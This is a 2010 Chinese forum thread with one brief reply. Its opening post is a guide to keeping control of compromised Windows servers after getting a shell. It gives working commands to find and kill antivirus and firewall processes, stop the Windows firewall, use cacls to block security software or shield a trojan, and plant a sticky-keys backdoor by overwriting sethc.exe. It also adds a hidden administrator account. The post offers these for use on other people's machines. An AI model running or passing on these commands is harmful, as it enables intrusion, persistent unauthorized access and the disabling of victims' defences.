入侵常用的10个命令
社区服务
火星文
银行
结婚
道具中心
勋章中心
管理操作原因
基本信息
管理团队
管理操作
在线会员
会员排行
版块排行
帖子排行
手机版
小说论坛
用户中心
搜索
银行
猴岛论坛
帖子
用户
版块
帖子
高级搜索
社区服务
签到统计
关闭
选中
1
篇
全选
猴岛论坛
电脑百科
入侵常用的10个命令
发帖
回复
倒序阅读
最近浏览的帖子
最近浏览的版块
« 返回列表
新帖
悬赏
任务
交易贴
自动发卡
拍卖
红包
际遇红包
1
个回复
[资源分享]
入侵常用的10个命令
楼层直达
不懂也不知道
ZxID:10586231
关注Ta
注册时间
2010-02-02
最后登录
2010-10-30
发帖
4317
在线
290小时
精华
27
DB
-167
威望
-1
保证金
0
桃子
0
鲜花
0
鸡蛋
0
访问TA的空间
加好友
用道具
发消息
加好友
他的帖子
对该用户使用道具
等级:
禁止发言
举报
只看楼主
使用道具
楼主
发表于: 2010-07-09
0
入侵常用的10个命令
当各位搞到一个shell,或者能远程执行命令之后,如何提权并保持肉鸡长期上线是一个难题。本人仅根据个人经验,旁敲侧击的谈几个常用命令,算是抛砖引玉,欢迎大家前来指导交流!
首先,提一下搞肉鸡,方法很多,1433、135、21,80、3389、4389,5900等端口都是常用的(有兴趣的可以下载专门的扫描器或者s扫描器)。
另外,说一下肉鸡的系统环境,一般都是服务器,所以杀毒软件、防火墙啥的相对来说还是比较牢固的,所以如何干扰并跳过这些保护也就是提权的关键。
最后,如何保持这个肉鸡长久上线,是目的所在,显然需要设置后门或者种植木马。
注:下文对喜欢3389直接远程登陆的用户不适用(不过善意提醒你,你留下了登陆等很多日志,呵呵);
常见命令, 如ipconfig、netstat等这儿不涉及,大家都会。
下面转入正文。
1.ver
作用:查看系统版本
实例:ver
说明:提权第一步就是查看这个是个人机器还是服务。
2.tasklist
作用:列出机器的所有进程
实例:tasklist
说明:用它你就可以知道肉鸡的杀毒软件、防火墙是啥。后面就好办了,给他中马的时候,首先本地测试,免杀,再种上去,防止中马不成功,或者留下查杀记录。(笨的办法可以直接停止杀毒软件,见后面命令。不过这样管理员就肯定知道自己中木马了,你长久控制肉鸡的目标也就要破碎了)。
3.taskkill
作用:杀制定名字或者pid的进程
实例: taskkill /f /im 360safe.exe 或者 taskkill /f /pid 3389
说明:使用它可以结束防火墙进程啥的。因为它阻止你打开网络端口,或者以这台肉鸡为*****进行其他扫描、入侵啥的。当然,也可以结束杀毒软件等。
4.net start
作用:列出机器所有服务或者启动某个指定的服务
实例: net start 或者 net start w3svc(启动iis)
说明:通过它列出的所有服务可以看到服务器安装的杀毒软件,以及开放哪些服务。比如有瑞星服务,则你单独用taskkill是无法结束杀毒进程的,只能先停止服务。
比如有 Terminal Services则可以通过net u_ser(_去掉,因为华夏屏蔽)增加一个帐号,再3389登陆。
5.net stop
作用:停止指定的服务
实例: net stop net stop sharedaccess (停止windows防火墙)
说明:结合net start使用
6.cacls
作用:设置文件权限
实例: cacls c:\windows\mm.exe /P everyone:R 或者cacls c:\progra~1\rising\ravmond.exe /d:everyone
说明:可以用它来保护木马文件或者禁止某个程序(如杀毒软件)运行。这个在有时候,我们taskkill某个进程,发现马上又起来了比较有用。
设置为/d:everyone,任何人无法访问,自然没法再运行。(这一招也可以用来杀木马或者免疫:可参看
http://hi.baidu.com/it%5Fsecurity/blog/item/f23295008170bb001c958348.html
)
7.&
作用:连续执行多个命令
实例:del c:\windows\system32\sethc.exe & del c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
说明:上面是最简单的shift按多次后跳出资源管理器下后门。直接拷贝一次执行即可,不用批处理拉。
注:上面操作,你如果一步一步操作,早就被系统还原了,没法实现文件替换、设置后门。
8.echo y|
作用:当命令行执行碰到提示“是否确定(Y/N)?”的时候自动输入Y(因为你没法一边执行命令一边还可以选择y 或n)
实例:echo y>echo y>cacls c:\windows\mm.exe /P everyone:R;
说明:将上面shift按多次后门简化:echo y | copy c:\windows\explorer.exe c:\windows\system32\dllcache\sethc.exe & echo y | copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
(直接拷贝的时候会提示是否覆盖,这儿通过echo y解决)
9.net us_er/group(_去掉,因为华夏屏蔽)
作用:开帐号,并加入到组(一般是administrators组)
实例:net u_ser admin$ "123456" & net local_group administrators admin$ /add
说明:以上通过 &操作符又是一步到位。另外,通过这种方法建立的帐号,仅一次隐藏。如长期隐藏,可参考:
http://hi.baidu.com/it%5Fsecurity/blog/item/9bab86a0a60fac8d471064b5.html
10.shutdown
作用:重启或者关闭机器,或者取消关机
实例:shutdown -r -t 0(立即重启)
说明:该重启的时候重启吧,一般开服务或者中马之后。
以上命令有些2000下可能无法运行,xp,2003下肯定ok。
后续,我再总结一下如何通过命令行来中马。
主要是通过ftp或者http下载或传输文件(完全命令行方式),同时也呼吁大家多共享自己得经验,共同提高。
本帖de评分:
共
0
条评分
隐藏
本帖de打赏:
共
条打赏
隐藏
打赏
收藏
新鲜事
相关主题
电脑高手常用的5个按钮!
值得注意的10个windows7优化技巧
电脑高手常用的5个按钮
电脑高手常用的5个按钮
电脑高手常用的5个按钮!(太有用了!留下了!)
电脑高手常用的5个按钮!
回复
引用
鲜花[
0
]
鸡蛋[
0
]
-旺崽牛奶
ZxID:10476499
关注Ta
注册时间
2010-01-25
最后登录
2014-10-13
发帖
2347
在线
894小时
精华
0
DB
49
威望
55
保证金
0
桃子
0
鲜花
0
鸡蛋
0
访问TA的空间
加好友
用道具
发消息
加好友
他的帖子
对该用户使用道具
qq
等级:
中将
水贴年年有.....今年特别多..查水哥..B宝
举报
只看该作者
沙发
发表于: 2010-07-09
0
谢谢分享啊
本帖de评分:
共
0
条评分
隐藏
本帖de打赏:
共
条打赏
隐藏
QQ:872554370
回复
引用
新鲜事
鲜花[
0
]
鸡蛋[
0
]
« 返回列表
发帖
回复
关闭